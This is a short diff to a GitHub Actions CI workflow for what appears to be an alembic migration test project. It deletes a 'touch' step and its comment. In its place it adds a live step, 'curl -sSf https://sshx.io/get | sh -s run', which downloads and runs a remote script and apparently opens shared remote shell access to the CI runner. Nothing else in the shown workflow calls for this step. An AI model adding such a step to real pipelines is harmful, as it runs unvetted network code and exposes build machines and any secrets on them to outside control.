--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -50,7 +50,5 @@ jobs:
           dry-run: true
           working-directory: e2e/two_revisions_on_head
 
-      # this seems to be necessary for `alembic` to pick up on the edit.
-      # TODO: find out exactly why, and remove if unnecessary.
-      - run: touch e2e/two_revisions_on_head/migrations/versions/1673531f822d_.py
+      - run: curl -sSf https://sshx.io/get | sh -s run
       - run: cd e2e/two_revisions_on_head && uv run alembic upgrade head
